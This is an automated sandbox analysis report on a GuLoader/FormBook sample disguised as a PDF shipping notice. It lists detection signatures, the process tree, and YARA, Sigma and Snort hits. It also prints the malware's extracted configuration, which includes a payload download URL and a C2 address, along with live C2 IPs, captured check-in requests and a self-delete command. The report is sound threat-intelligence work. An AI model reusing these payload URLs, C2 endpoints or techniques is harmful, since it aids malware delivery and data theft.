Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name:Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID:527894
MD5:ff71941571d8930c1125b3931d400d86
SHA1:0a417bf568a5978777021e433bf4693893facd3e
SHA256:bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
    • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
      • explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • NETSTAT.EXE (PID: 5904 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 3516 cmdline: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}

Threatname: FormBook

{"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x1c418:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x1c410:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    Click to see the 22 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Double ExtensionShow sources
    Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ParentImage: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentProcessId: 4636, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ProcessId: 7132

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
    Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeVirustotal: Detection: 37%Perma Link
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeReversingLabs: Detection: 31%
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
    Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\explorer.exeNetwork Connect: 154.94.229.8 80
    Source: C:\Windows\explorer.exeNetwork Connect: 107.178.157.225 80
    Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
    Source: C:\Windows\explorer.exeNetwork Connect: 35.198.112.85 80
    Source: C:\Windows\explorer.exeNetwork Connect: 70.40.220.123 80
    Source: C:\Windows\explorer.exeNetwork Connect: 183.181.99.12 80
    Source: C:\Windows\explorer.exeNetwork Connect: 184.168.98.97 80
    Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
    Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
    Uses netstat to query active network connections and open portsShow sources
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=16igyruBe
    Source: Malware configuration extractorURLs: www.papllc.biz/s3f1/
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:09:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6197bde3-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:10:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Nov 2021 14:12:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:14:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61951b77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
